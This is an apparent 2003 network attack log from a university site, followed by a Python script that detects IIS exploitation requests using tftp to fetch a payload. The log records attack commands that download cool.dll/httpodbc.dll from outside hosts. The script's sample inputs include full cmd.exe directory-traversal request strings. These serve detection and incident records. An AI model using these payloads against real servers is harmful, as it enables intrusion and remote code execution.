*SHORT* summary of some of the attacks against us for Feb. 2003
Just too many scans and not enough time to keep the list up all the time.

date-time EASTERN       source_ip[:port] (dns name, if any)                      attack/scan/notes
2003/02/03-05:55:15.00  203.129.254.22   (Internet Systems Group ISG,BANGALOR,IN)  1. attack web servers w/ buffer overflow; cmd:
2003/02/03-05:55:15.00  203.129.254.22   (Internet Systems Group ISG,BANGALOR,IN)  2. tftp%20-i%20132.132.64.247%20GET%20cool.dll%20c:\httpodbc.dll
2003/02/04-12:35:29.54  65.40.197.208    (user208.net512.nj.sprint-hsd.net)        pound on prime port 5281
2003/02/04-15:48:14.95  210.186.112.182  (TMnet Telekom Malaysia,MY)               try to login on 132.235.16.100 as root
2003/02/04-16:10:07.24  132.235.79.73    (dhcp-079-073.cns.ohiou.edu)              portscan 132.235.1.249
2003/02/04-16:20:30.78  132.235.79.73    (dhcp-079-073.cns.ohiou.edu)              portscan 132.235.4.249
2003/02/05-10:20:07.98  65.40.197.208    (user208.net512.nj.sprint-hsd.net)        pound on prime port 5281
2003/02/05-15:31:03.81  65.40.197.208    (user208.net512.nj.sprint-hsd.net)        pound on prime port 5281
2003/02/06-00:12:57.75  128.61.152.107   (elm.psych.gatech.edu)                    portscan 132.235.1.12
2003/02/06-00:35:28.21  148.245.41.74    (c074.coral.com.mx)                       scan net for port 23; rlogin buffer overflow attack
2003/02/12-13:37:20.41  132.235.241.55   (...ilgard.ohiou.edu)                     portscan prime
2003/02/13-15:22:03.61  203.129.254.22   ()                                        attack web servers w/ cmd tftp%20-i%20132.132.64.193%20GET%20cool.dll%20e
2003/02/15-11:37:55.72  12.11.149.5      (ptc-gw.ptc.com)                          attack web server w/ tftp%20-i%20132.253.180.93%20GET%20cool.dll%20d:
2003/02/20-16:54:47.48  132.235.241.55   (ilgard.ohiou.edu)                        portscan 132.235.1.12
2003/02/20-15:23:41.87  216.221.81.98    (d221-216-98.systems.cogeco.net)          1. hack into local pc via IIS; ftp to 65.113.83.134:1969
2003/02/20-15:23:41.87  216.221.81.98    (d221-216-98.systems.cogeco.net)          2. login leech, passwd dark, to get firedaemon software, etc.
2003/02/20-15:23:41.87  216.221.81.98    (d221-216-98.systems.cogeco.net)          3. ERunAs2X.exe SFind.exe rundllhook.exe...
2003/02/26-15:56:37.07  195.146.229.193  (poold7-193.adsl.nordnet.fr)              1. attack 17.84 via IIS; connect to 128.61.46.40 via ftp
2003/02/26-15:56:37.07  195.146.229.193  (poold7-193.adsl.nordnet.fr)              2. login/pass = send/dnes and get /httpodbc.dll /ays.exe
2003/03/05-16:17:40.79  211.20.5.85      (Jing Shing Enterprise Ltd.,TW)           1. Massive attack against bobcat: HTTP overflows, ftp holes,
2003/03/05-16:17:40.79  211.20.5.85      (Jing Shing Enterprise Ltd.,TW)           2. telnet/ssh tries, stupid root passwd, something about
2003/03/05-16:17:40.79  211.20.5.85      (Jing Shing Enterprise Ltd.,TW)           3. nessus in login/passwd
2003/03/05-16:17:40.79  211.20.5.85      (Jing Shing Enterprise Ltd.,TW)           4. and email addresses. -maybe nessus scan of bobcat?
2003/03/05-18:24:42.03  132.203.10.101   (poste101-10.sbf.ulaval.ca)               1. scan net for port 1433
2003/03/05-23:37:11.53  132.203.10.101   (poste101-10.sbf.ulaval.ca)               2. attack several ips on port 1433,
2003/03/05-23:37:11.53  132.203.10.101   (poste101-10.sbf.ulaval.ca)               3. thru 2003/03/06-03:54:12.22
2003/03/05-09:25:50.69  132.235.227.94   (dhcp-227-094.cns.ohiou.edu)              scan net for ports 138,139,445
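Three of the entries above are the same IIS attack pattern: a command-execution hole is used to make the web server run `tftp -i <host> GET cool.dll <local path>`, pulling a payload (here dropped as httpodbc.dll) from a staging host the attacker controls. The script below is an added detection example, not part of the original log or any tool it mentions; it URL-decodes web request lines (repeatedly, because these attacks double-encode) and flags any that carry a tftp staging command, extracting the staging host as an indicator. The sample request lines are constructed from the encoded commands recorded in the log; the `cmd.exe?/c+` traversal wrapper around them is an assumption, not something the log shows.

```python
"""Flag web requests that abuse IIS command execution to stage a payload via tftp.

Added example for the 2003 attack log; not code from the original page.
Sample requests are constructed from the encoded commands in the log entries.
"""
import re
from urllib.parse import unquote_plus

# "tftp -i <host> GET <remote-file> [<local-path>]" as it appears once decoded.
TFTP_STAGING = re.compile(
    r"tftp\s+(?:-i\s+)?(?P<host>\d{1,3}(?:\.\d{1,3}){3})\s+get\s+"
    r"(?P<remote>\S+)(?:\s+(?P<local>\S+))?",
    re.IGNORECASE,
)

# Constructed sample input: the three tftp commands from the log, wrapped in an
# assumed cmd.exe traversal request, plus two benign requests for contrast.
SAMPLE_REQUESTS = [
    r"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20132.132.64.247%20GET%20cool.dll%20c:\httpodbc.dll",
    r"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20132.132.64.193%20GET%20cool.dll%20e",
    r"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20132.253.180.93%20GET%20cool.dll%20d:",
    "GET /index.html",
    "GET /scripts/search.asp?q=tftp+client+download",  # mentions tftp, no staging command
]


def decode_request(line: str, rounds: int = 3) -> str:
    """Percent-decode until stable so %255c (double-encoded backslash) becomes a backslash.
    '+' is treated as a space, which also splits cmd.exe?/c+tftp into separate words."""
    cur = line
    for _ in range(rounds):
        nxt = unquote_plus(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def find_tftp_staging(line: str):
    """Return the staging host / files for one request line, or None if it is clean."""
    m = TFTP_STAGING.search(decode_request(line))
    if not m:
        return None
    return {"host": m.group("host"), "remote": m.group("remote"), "local": m.group("local")}


def scan(lines):
    """Run the detector over a batch of request lines; keep the line index for triage."""
    hits = []
    for idx, line in enumerate(lines):
        hit = find_tftp_staging(line)
        if hit:
            hit["line"] = idx
            hits.append(hit)
    return hits


def staging_hosts(lines):
    """Unique tftp staging hosts, sorted: the IOCs worth blocking at the border."""
    return sorted({h["host"] for h in scan(lines)})


if __name__ == "__main__":
    for h in scan(SAMPLE_REQUESTS):
        print(f"line {h['line']}: tftp staging from {h['host']} -> {h['remote']} as {h['local']}")
    print("staging hosts:", staging_hosts(SAMPLE_REQUESTS))
```

Run it against real IIS request logs by feeding the request-URI column to `scan()`; the staging host is the useful indicator, since the attacking client IP (as the log above shows for 203.129.254.22) changes while the host serving cool.dll stays in the same network.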